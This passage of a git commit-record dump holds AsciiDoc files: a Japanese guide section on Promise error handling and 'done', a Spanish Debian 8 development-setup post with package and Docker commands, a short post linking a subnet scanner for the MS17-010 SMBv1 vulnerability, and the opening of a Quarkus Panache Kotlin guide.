\u3068\u3044\u3046typo\u304c\u3042\u308b\n\n\u3053\u306e\u5834\u5408\u306f\u3001`console`\u3092`conosle`\u3068typo\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3059\u308b\u306f\u305a\u3067\u3059\u3002\n\n> ReferenceError: 
conosle is not defined\n\n\u3057\u304b\u3057\u3001Promise\u3067\u306ftry-catch\u3055\u308c\u308b\u305f\u3081\u3001\u30a8\u30e9\u30fc\u304c\u63e1\u308a\u3064\u3076\u3055\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u73fe\u8c61\u304c\u767a\u751f\u3057\u3084\u3059\u304f\u306a\u308a\u307e\u3059\u3002\n\u6bce\u56de\u3001\u6b63\u3057\u304f`catch`\u306e\u51e6\u7406\u3092\u66f8\u304f\u3053\u3068\u304c\u51fa\u6765\u308b\u5834\u5408\u306f\u4f55\u3082\u554f\u984c\u3042\u308a\u307e\u305b\u3093\u304c\u3001\nPromise\u306e\u5b9f\u88c5\u306b\u3088\u3063\u3066\u306f\u3053\u306e\u3088\u3046\u306a\u30df\u30b9\u304c\u691c\u77e5\u3057\u306b\u304f\u304f\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u3053\u3068\u3092\u77e5\u3063\u3066\u304a\u304f\u3079\u304d\u3067\u3057\u3087\u3046\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u306f__unhandled rejection__\u3068\u8a00\u308f\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\nRejected\u3055\u308c\u305f\u6642\u306e\u51e6\u7406\u304c\u306a\u3044\u3068\u3044\u3046\u305d\u306e\u307e\u307e\u306e\u610f\u5473\u3067\u3059\u306d\u3002\n\n[NOTE]\n====\n\u3053\u306eunhandled rejection\u304c\u691c\u77e5\u3057\u306b\u304f\u3044\u554f\u984c\u306fPromise\u306e\u5b9f\u88c5\u306b\u4f9d\u5b58\u3057\u307e\u3059\u3002\n\u4f8b\u3048\u3070\u3001 https:\/\/github.com\/yahoo\/ypromise[ypromise] \u306funhandled rejection\u304c\u3042\u308b\u5834\u5408\u306f\u3001\u305d\u306e\u4e8b\u3092\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u8868\u793a\u3057\u307e\u3059\u3002\n\n> Promise rejected but no error handlers were registered to it\n\n\u307e\u305f\u3001 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u306e\u5834\u5408\u3082\u3001\n\u660e\u3089\u304b\u306b\u4eba\u9593\u306e\u30df\u30b9\u306b\u307f\u3048\u308bReferenceError\u306e\u5834\u5408\u306a\u3069\u306f\u305d\u306e\u307e\u307e\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u30a8\u30e9\u30fc\u3092\u8868\u793a\u3057\u3066\u304f\u308c\u307e\u3059\u3002\n\n> \"Possibly unhandled ReferenceError. 
conosle is not defined\n\n\u30cd\u30a4\u30c6\u30a3\u30d6\u306ePromise\u306e\u5834\u5408\u3082\u540c\u69d8\u306b\u3053\u306e\u554f\u984c\u3078\u306e\u5bfe\u51e6\u3068\u3057\u3066GC-based unhandled rejection tracking\u3068\u3044\u3046\u3082\u306e\u304c\n\u642d\u8f09\u3055\u308c\u3064\u3064\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u30ac\u30fc\u30d9\u30c3\u30b8\u30b3\u30ec\u30af\u30b7\u30e7\u30f3\u306b\u3088\u3063\u3066\u56de\u53ce\u3055\u308c\u308b\u3068\u304d\u306b\u3001\n\u305d\u308c\u304cunhandled rejection\u3067\u3042\u308b\u306a\u3089\u3001\u30a8\u30e9\u30fc\u8868\u793a\u3092\u3059\u308b\u3068\u3044\u3046\u4ed5\u7d44\u307f\u304c\u30d9\u30fc\u30b9\u3068\u306a\u3063\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002\n\nhttps:\/\/twitter.com\/domenic\/status\/461154989856264192[Firefox] \u3084 https:\/\/code.google.com\/p\/v8\/issues\/detail?id=3093[Chrome] \u306e\u30cd\u30a4\u30c6\u30a3\u30d6Promise\u3067\u306f\u4e00\u90e8\u5b9f\u88c5\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n====\n\n=== done\u306e\u5b9f\u88c5\n\nPromise\u306b\u304a\u3051\u308b `done` \u306f\u5148\u7a0b\u306e\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u3092\u907f\u3051\u308b\u306b\u306f\u3069\u3046\u3059\u308b\u304b\u3068\u3044\u3046\u65b9\u6cd5\u8ad6\u3068\u3057\u3066\u3001\n\u305d\u3082\u305d\u3082\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u3057\u306a\u3051\u308c\u3070\u3044\u3044 \u3068\u3044\u3046\u8c6a\u5feb\u306a\u89e3\u6c7a\u65b9\u6cd5\u3092\u63d0\u4f9b\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u3067\u3059\u3002\n\n`done`\u306fPromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u308b\u306e\u3067\u3001\n`Promise.prototype.done`\u3068\u3044\u3046Promise\u306eprototype\u62e1\u5f35\u3068\u3057\u3066\u5b9f\u88c5\u3057\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[promise-prototype-done.js]]\n.promise-prototype-done.js\n----\ninclude::lib\/promise-prototype-done.js[]\n----\n\nsetTimeout\u306e\u4e2d\u3067throw\u3092\u3059\u308b\u3053\u3068\u3067\u3001\u5916\u3078\u305d\u306e\u307e\u307e\u4f8b\u5916\u3092\u6295\u3052\u308b\u3053\u3068\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\n\n[source,js]\n.setTimeout\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u5185\u306e\u4f8b\u5916\n----\ntry{\n setTimeout(function callback() {\n throw new Error(\"error\");\/\/ <1>\n }, 0);\n}catch(error){\n console.error(error);\n}\n----\n<1> \u3053\u306e\u4f8b\u5916\u306f\u30ad\u30e3\u30c3\u30c1\u3059\u308b\u3053\u3068\u51fa\u6765\u306a\u3044\n\n[NOTE]\n====\n\u306a\u305c\u975e\u540c\u671f\u306e`callback`\u5185\u3067\u306e\u4f8b\u5916\u3092\u30ad\u30e3\u30c3\u30c1\u51fa\u6765\u306a\u3044\u306e\u304b\u306f\u4ee5\u4e0b\u304c\u53c2\u8003\u306a\u308a\u307e\u3059\u3002\n\n- http:\/\/techblog.yahoo.co.jp\/programming\/javascript_error\/[JavaScript\u3068\u975e\u540c\u671f\u306e\u30a8\u30e9\u30fc\u51e6\u7406 - Yahoo! 
JAPAN Tech Blog]\n====\n\n<<promise-prototype-done.js,`Promise.prototype.done`>> \u3092\u3088\u304f\u898b\u3066\u307f\u308b\u3068\u3001\u4f55\u3082`return`\u3057\u3066\u3044\u306a\u3044\u3053\u3068\u3082\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\u3064\u307e\u308a\u3001`done`\u306f\u300c\u3053\u3053\u3067Promise chain\u306f\u7d42\u4e86\u3057\u3066\u3001\u4f8b\u5916\u304c\u8d77\u304d\u305f\u5834\u5408\u306f\u305d\u306e\u307e\u307epromise\u306e\u5916\u3078\u6295\u3052\u76f4\u3059\u300d\u3068\u3044\u3046\u51e6\u7406\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u5b9f\u88c5\u3084\u74b0\u5883\u304c\u3057\u3063\u304b\u308a\u5bfe\u5fdc\u3057\u3066\u3044\u308c\u3070\u3001__unhandled rejection__\u306e\u691c\u77e5\u306f\u3067\u304d\u308b\u305f\u3081\u3001\u5fc5\u305a\u3057\u3082`done`\u304c\u5fc5\u8981\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u304f\u3001\n\u307e\u305f\u4eca\u56de\u306e<<promise-prototype-done.js,`Promise.prototype.done`>>\u306e\u3088\u3046\u306b\u3001`done`\u306f\u65e2\u5b58\u306ePromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u305f\u3081\u3001\n<<es6-promises,ES6 Promises>>\u306e\u4ed5\u69d8\u305d\u306e\u3082\u306e\u306b\u306f\u5165\u3089\u306a\u304b\u3063\u305f\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n[NOTE]\n\u4eca\u56de\u306e`Promise.prototype.done`\u306e\u5b9f\u88c5\u306f https:\/\/www.promisejs.org\/[promisejs.org] \u3092\u53c2\u8003\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n\n=== \u307e\u3068\u3081\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001 https:\/\/github.com\/kriskowal\/q\/wiki\/API-Reference#promisedoneonfulfilled-onrejected-onprogress[Q] \u3084 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u3084 https:\/\/github.com\/cscott\/prfun#promisedone--undefined[prfun] \u7b49\n\u591a\u304f\u306ePromise\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b`done`\u306e\u57fa\u790e\u7684\u306a\u5b9f\u88c5\u3068\u3001`then`\u3068\u306f\u3069\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3073\u307e\u3057\u305f\u3002\n\n`done`\u306b\u306f2\u3064\u306e\u5074\u9762\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\n\n* `done`\u306e\u4e2d\u3067\u8d77\u304d\u305f\u30a8\u30e9\u30fc\u306f\u5916\u3078\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u76f4\u3059\n* Promise chain \u3092\u7d42\u4e86\u3059\u308b\u3068\u3044\u3046\u5ba3\u8a00\n\n<<then-or-catch,then or catch?>> \u3068\u540c\u69d8\u306bPromise\u306b\u3088\u308a\u6c88\u9ed9\u3057\u3066\u3057\u307e\u3063\u305f\u30a8\u30e9\u30fc\u306b\u3064\u3044\u3066\u306f\u3001\n\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u3084\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u6539\u5584\u7b49\u3067\u6b86\u3069\u306e\u30b1\u30fc\u30b9\u3067\u306f\u554f\u984c\u3067\u306f\u306a\u304f\u306a\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u307e\u305f\u3001`done`\u306f\u5024\u3092\u8fd4\u3055\u306a\u3044\u4e8b\u3067\u305d\u308c\u4ee5\u4e0aPromise chain\u3092\u7e4b\u3052\u308b\u4e8b\u304c\u3067\u304d\u306a\u304f\u306a\u308b\u305f\u3081\u3001\n\u305d\u306e\u3088\u3046\u306a\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u7528\u9014\u3067`done`\u3092\u4f7f\u3046\u3053\u3068\u3082\u51fa\u6765\u307e\u3059\u3002\n\n<<es6-promises,ES6 Promises>> 
\u3067\u306f\u6839\u672c\u306b\u7528\u610f\u3055\u308c\u3066\u308b\u6a5f\u80fd\u306f\u3042\u307e\u308a\u591a\u304f\u3042\u308a\u307e\u305b\u3093\u3002\n\u305d\u306e\u305f\u3081\u3001\u81ea\u3089\u62e1\u5f35\u3057\u305f\u308a\u3001\u62e1\u5f35\u3057\u305f\u30e9\u30a4\u30d6\u30e9\u30ea\u7b49\u3092\u5229\u7528\u3059\u308b\u30b1\u30fc\u30b9\u304c\u591a\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u305d\u306e\u6642\u3067\u3082\u4f55\u3067\u3082\u3084\u308a\u904e\u304e\u308b\u3068\u3001\u305b\u3063\u304b\u304f\u975e\u540c\u671f\u51e6\u7406\u3092Promise\u3067\u307e\u3068\u3081\u3066\u3082\u8907\u96d1\u5316\u3057\u3066\u3057\u307e\u3046\u5834\u5408\u304c\u3042\u308b\u305f\u3081\u3001\n\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u306e\u306f\u62bd\u8c61\u7684\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3067\u3042\u308bPromise\u306b\u304a\u3044\u3066\u306f\u5927\u4e8b\u306a\u90e8\u5206\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c8d57eb5701a7a561f50ed6ea083617e678cfd2b","subject":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","message":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","new_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo-Debian-8.adoc","new_contents":"= Despliegue de entorno base de trabajo (Debian 8)\nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-11-01\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal,Work,Php, Python, JS\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n\n\n\n### Paquetes basicos \n\nlocate rsync bash-completion wget tcpdump ntpdate finger links lynx ccze ethtool rcconf deborphan less screen tree curl wget telnet iputils-ping dnsutils lsof patch irqbalance acpi-support lvm2 powermgmt-base openssh-server sudo ssh-askpass ssl-cert ca-certificates libnet-dns-perl iproute psad libpam-cracklib locales util-linux-locales bridge-utils iftop sysstat snmp smartmontools lm-sensors htop iftop powertop apmd vim vim-scripts bash-completion perl-modules python-minimal python-pip python-setuptools ruby php5-cli git-core xfsprogs btrfs-tools dosfstools ntfs-3g cifs-utils firmware-linux firmware-linux-free firmware-linux-nonfree initramfs-tools lsb-release localepurge hdparm inkscape dia gdebi geany apt-transport-https openjdk-7-jre openjdk-7-jre-headless virtualbox vagrant vlc exaile libavcodec-extra guake pgadmin3\n\n### Instalar Skype\nhttps:\/\/wiki.debian.org\/skype#Debian_8_.22Jessie.22\n\n### Instalar Docker \nhttps:\/\/docs.docker.com\/installation\/debian\/#debian-jessie-80-64-bit\n\nAgregar Imagenes Docker:\n\ndocker pull odoo -> https:\/\/hub.docker.com\/_\/odoo\/\n\ndocker pull postgres -> https:\/\/hub.docker.com\/_\/postgres\/\n\ndocker pull mysql -> https:\/\/hub.docker.com\/_\/mysql\/\n\ndocker pull schmunk42\/yii2-app-basic\t\n\ndocker pull wordpress 
https:\/\/hub.docker.com\/_\/wordpress\/\n\ndocker pull k3v0r\/janus-gateway\n\ndocker pull node -> https:\/\/hub.docker.com\/_\/node\/\n\ndocker pull httpd -> https:\/\/hub.docker.com\/_\/httpd\/ \n\ndocker pull nginx -> https:\/\/hub.docker.com\/_\/nginx\/\n\ndocker pull debian -> https:\/\/hub.docker.com\/_\/debian\/\n\ndocker pull ubuntu -> https:\/\/hub.docker.com\/_\/ubuntu\/\n\ndocker pull fedora -> https:\/\/hub.docker.com\/_\/fedora\/\n\ndocker pull django -> https:\/\/hub.docker.com\/_\/django\/\n\ndocker pull mongo -> https:\/\/hub.docker.com\/_\/mongo\/\n\ndocker pull mariadb -> https:\/\/hub.docker.com\/_\/mariadb\/\n\ndocker pull redis -> https:\/\/hub.docker.com\/_\/redis\/\n\ndocker pull cassandra -> https:\/\/hub.docker.com\/_\/cassandra\/\n\ndocker pull couchbase -> https:\/\/hub.docker.com\/_\/couchbase\/\n\ndocker pull drupal -> https:\/\/hub.docker.com\/_\/drupal\/\n\ndocker pull elasticsearch -> https:\/\/hub.docker.com\/_\/elasticsearch\/\n\ndocker pull php -> https:\/\/hub.docker.com\/_\/php\/\n\ndocker pull owncloud -> https:\/\/hub.docker.com\/_\/owncloud\/ \n\ndocker pull jenkins -> https:\/\/hub.docker.com\/_\/jenkins\/\n\n\ndocker pull gitlab\/gitlab-ce -> https:\/\/hub.docker.com\/r\/gitlab\/gitlab-ce\/ \n\ndocker pull sebp\/elk -> https:\/\/hub.docker.com\/r\/sebp\/elk\/\n\ndocker pull htdvisser\/taiga-back -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-back\/\n\ndocker pull htdvisser\/taiga-front-dist -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-front-dist\/\n\ndocker pull zabbix\/zabbix-server-2.4 -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-server-2.4\/ \n\ndocker pull zabbix\/zabbix-db-mariadb -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-db-mariadb\/\n\ndocker pull coudot\/lemonldap-ng -> https:\/\/hub.docker.com\/r\/coudot\/lemonldap-ng\/ \n\ndocker pull p0bailey\/docker-flask -> https:\/\/hub.docker.com\/r\/p0bailey\/docker-flask\/\n\ndocker pull dinkel\/openldap -> https:\/\/hub.docker.com\/r\/dinkel\/openldap\/ \t\n\ndocker pull debian\/debhelper -> todo lo necesario para empaquetar \n\n\n\t# Correr Odoo dentro de Docker \n\tdocker run -d -e POSTGRES_USER=odoo -e POSTGRES_PASSWORD=odoo --name db postgres\n\tdocker run -p 127.0.0.1:8069:8069 --name odoo --link db:db -t odoo\n\n\t# Proyectos en Yii2 \n\tdocker run -p 8888:80 schmunk42\/yii2-app-basic\n\t\n\t# Proyectos en Wordpress \n\tdocker run --name some-wordpress --link some-mysql:mysql -d wordpress\n\n\/\/# agregar todas las imagenes de un solo comando:\n\n\/\/ docker pull odoo && docker pull postgres && docker pull mysql && docker pull schmunk42\/yii2-app-basic\t&& docker pull wordpress && docker pull k3v0r\/janus-gateway && docker pull node && docker pull httpd && docker pull nginx && docker pull debian && docker pull ubuntu && docker pull fedora && docker pull django && docker pull mongo && docker pull mariadb && docker pull redis && docker pull cassandra && docker pull couchbase && docker pull drupal && docker pull elasticsearch && docker pull php && docker pull owncloud && docker pull jenkins && docker pull gitlab\/gitlab-ce && docker pull sebp\/elk && docker pull htdvisser\/taiga-back && docker pull htdvisser\/taiga-front-dist && docker pull zabbix\/zabbix-server-2.4 && docker pull zabbix\/zabbix-db-mariadb && docker pull coudot\/lemonldap-ng && docker pull p0bailey\/docker-flask && docker pull dinkel\/openldap \n\n# Otras Opciones de entornos:\n\n # Instalar Composer \n https:\/\/styde.net\/instalar-y-actualizar-paquetes-con-composer\/\n 
http:\/\/librosweb.es\/libro\/composer\/capitulo_1\/instalacion_en_servidores_linux.html\n\n\n # Instalar homestead \n https:\/\/styde.net\/crea-entornos-de-desarrollo-para-laravel-con-homestead\/\n https:\/\/styde.net\/como-instalar-y-configurar-laravel-homestead-2-0\/\n vagrant box add laravel\/homestead\n composer global require \"laravel\/homestead=~2.0\"\n export PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"\n echo 'export PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"' >> \/home\/user\/.bashrc\n\n # Instalar node \n https:\/\/github.com\/nodejs\/node-v0.x-archive\/wiki\/Installing-Node.js-via-package-manager?\tutm_source=[deliciuos]&utm_medium=twitter#debian-and-ubuntu-based-linux-distributions\n\n\t# Setting up Django with Nginx, Gunicorn, virtualenv, supervisor and PostgreSQL\n http:\/\/michal.karzynski.pl\/blog\/2013\/06\/09\/django-nginx-gunicorn-virtualenv-supervisor\/\n\n\t\n\n\nTIP: happy hacking!!!\n","old_contents":"= Despliegue de entorno base de trabajo\nJavier Le\u00f3n (@jelitox) <jel1284@gmail.com>\nv1.0, 2015-11-01\n:toc:\n:imagesdir: assets\/images\n:homepage: http:\/\/blog.javierleon.com.ve\n:hp-tags: Blog,Personal,Work,Php, Python, JS\n\/\/ Web page meta data.\n:keywords: Blog, Javier Le\u00f3n, IT, Devops, Desarrollo, Sysadmin, Social, Networks, emprendimiento, Pagina Oficial,\n:description: Blog personal y Profesional, +\nIngeniero en Informatica, desarrollador y Administrador de Sistemas e infraestructura, +\nRedes Sociales, facebook, instagram, twitter, pinterest +\nproyectos de emprendimiento Freenlance, +\nPagina principal.\n\n.{revdate}: {revnumber} \n\n\n\n### Paquetes basicos \n\nlocate rsync bash-completion wget tcpdump ntpdate finger links lynx ccze ethtool rcconf deborphan less screen tree curl wget telnet iputils-ping dnsutils lsof patch irqbalance acpi-support lvm2 powermgmt-base openssh-server sudo ssh-askpass ssl-cert ca-certificates libnet-dns-perl iproute psad libpam-cracklib locales util-linux-locales bridge-utils iftop sysstat snmp smartmontools lm-sensors htop iftop powertop apmd vim vim-scripts bash-completion perl-modules python-minimal python-pip python-setuptools ruby php5-cli git-core xfsprogs btrfs-tools dosfstools ntfs-3g cifs-utils firmware-linux firmware-linux-free firmware-linux-nonfree initramfs-tools lsb-release localepurge hdparm inkscape dia gdebi geany apt-transport-https openjdk-7-jre openjdk-7-jre-headless virtualbox vagrant vlc exaile libavcodec-extra guake pgadmin3\n\n### Instalar Skype\nhttps:\/\/wiki.debian.org\/skype#Debian_8_.22Jessie.22\n\n### Instalar Docker \nhttps:\/\/docs.docker.com\/installation\/debian\/#debian-jessie-80-64-bit\n\nAgregar Imagenes Docker:\n\ndocker pull odoo -> https:\/\/hub.docker.com\/_\/odoo\/\ndocker pull postgres -> https:\/\/hub.docker.com\/_\/postgres\/\ndocker pull mysql -> https:\/\/hub.docker.com\/_\/mysql\/\ndocker pull schmunk42\/yii2-app-basic\t\ndocker pull wordpress https:\/\/hub.docker.com\/_\/wordpress\/\ndocker pull k3v0r\/janus-gateway\ndocker pull node -> https:\/\/hub.docker.com\/_\/node\/\ndocker pull httpd -> https:\/\/hub.docker.com\/_\/httpd\/ \ndocker pull nginx -> https:\/\/hub.docker.com\/_\/nginx\/\ndocker pull debian -> https:\/\/hub.docker.com\/_\/debian\/\ndocker pull ubuntu -> https:\/\/hub.docker.com\/_\/ubuntu\/\ndocker pull fedora -> https:\/\/hub.docker.com\/_\/fedora\/\ndocker pull django -> https:\/\/hub.docker.com\/_\/django\/\ndocker pull mongo -> https:\/\/hub.docker.com\/_\/mongo\/\ndocker pull mariadb -> https:\/\/hub.docker.com\/_\/mariadb\/\ndocker pull 
redis -> https:\/\/hub.docker.com\/_\/redis\/\ndocker pull cassandra -> https:\/\/hub.docker.com\/_\/cassandra\/\ndocker pull couchbase -> https:\/\/hub.docker.com\/_\/couchbase\/\ndocker pull drupal -> https:\/\/hub.docker.com\/_\/drupal\/\ndocker pull elasticsearch -> https:\/\/hub.docker.com\/_\/elasticsearch\/\ndocker pull php -> https:\/\/hub.docker.com\/_\/php\/\ndocker pull owncloud -> https:\/\/hub.docker.com\/_\/owncloud\/ \ndocker pull jenkins -> https:\/\/hub.docker.com\/_\/jenkins\/\ndocker pull gitlab\/gitlab-ce -> https:\/\/hub.docker.com\/r\/gitlab\/gitlab-ce\/ \ndocker pull sebp\/elk -> https:\/\/hub.docker.com\/r\/sebp\/elk\/\ndocker pull htdvisser\/taiga-back -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-back\/\ndocker pull htdvisser\/taiga-front-dist -> https:\/\/hub.docker.com\/r\/htdvisser\/taiga-front-dist\/\ndocker pull zabbix\/zabbix-server-2.4 -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-server-2.4\/ \ndocker pull zabbix\/zabbix-db-mariadb -> https:\/\/hub.docker.com\/r\/zabbix\/zabbix-db-mariadb\/\ndocker pull coudot\/lemonldap-ng -> https:\/\/hub.docker.com\/r\/coudot\/lemonldap-ng\/ \ndocker pull p0bailey\/docker-flask -> https:\/\/hub.docker.com\/r\/p0bailey\/docker-flask\/\ndocker pull dinkel\/openldap -> https:\/\/hub.docker.com\/r\/dinkel\/openldap\/ \t\n\n# agregar todas las imagenes de un solo comando:\n\n\/\/ docker pull odoo && docker pull postgres && docker pull mysql && docker pull schmunk42\/yii2-app-basic\t&& docker pull wordpress && docker pull k3v0r\/janus-gateway && docker pull node && docker pull httpd && docker pull nginx && docker pull debian && docker pull ubuntu && docker pull fedora && docker pull django && docker pull mongo && docker pull mariadb && docker pull redis && docker pull cassandra && docker pull couchbase && docker pull drupal && docker pull elasticsearch && docker pull php && docker pull owncloud && docker pull jenkins && docker pull gitlab\/gitlab-ce && docker pull sebp\/elk && docker pull htdvisser\/taiga-back && docker pull htdvisser\/taiga-front-dist && docker pull zabbix\/zabbix-server-2.4 && docker pull zabbix\/zabbix-db-mariadb && docker pull coudot\/lemonldap-ng && docker pull p0bailey\/docker-flask && docker pull dinkel\/openldap \n\n\n\n\n#Pendientes \ndocker pull debian\/debhelper -> todo lo necesario para empaquetar \n\n\n\t# Correr Odoo dentro de Docker \n\tdocker run -d -e POSTGRES_USER=odoo -e POSTGRES_PASSWORD=odoo --name db postgres\n\tdocker run -p 127.0.0.1:8069:8069 --name odoo --link db:db -t odoo\n\n\t# Proyectos en Yii2 \n\tdocker run -p 8888:80 schmunk42\/yii2-app-basic\n\t\n\t# Proyectos en Wordpress \n\tdocker run --name some-wordpress --link some-mysql:mysql -d wordpress\n\n\t# Proyecto con Janus \n\n### Instalar Composer \nhttps:\/\/styde.net\/instalar-y-actualizar-paquetes-con-composer\/\nhttp:\/\/librosweb.es\/libro\/composer\/capitulo_1\/instalacion_en_servidores_linux.html\n\n\n### Agregar homestead \nhttps:\/\/styde.net\/crea-entornos-de-desarrollo-para-laravel-con-homestead\/\nhttps:\/\/styde.net\/como-instalar-y-configurar-laravel-homestead-2-0\/\n\n\nvagrant box add laravel\/homestead\ncomposer global require \"laravel\/homestead=~2.0\"\nexport PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"\necho 'export PATH=\"$HOME\/.composer\/vendor\/bin:$PATH\"' >> \/home\/user\/.bashrc\n\n### Instalar node \nhttps:\/\/github.com\/nodejs\/node-v0.x-archive\/wiki\/Installing-Node.js-via-package-manager?utm_source=[deliciuos]&utm_medium=twitter#debian-and-ubuntu-based-linux-distributions\n\n\n\n\n\nTIP: 
happy hacking!!!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d92a3ed3287c6ea68dd123f4bc173cd4d8bf0932","subject":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","message":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check if a Windows machine is vulnerable to the DoublePulsar \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WanaCrypt ransomware]).\n\nThe tool is great; however, it only checks a single IP address, so I forked and made a quick modification so it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","old_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomeware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check if a Windows machine is vulnerable to the Eternalblue \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WanaCrypt ransomware].)\n\nThe tool is great, however it only checks a single IP address, so I forked and made a quick modification so it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c03a6245c1436f2bb887a21bf3f7061b755e7cbc","subject":"Fix a link in the Panache Kotlin guide","message":"Fix a link in the Panache Kotlin guide\n\n+ fix a couple of case issues in passing\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-kotlin.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-kotlin.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache and Kotlin\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto standard JPA implementation and is well-known in the Java 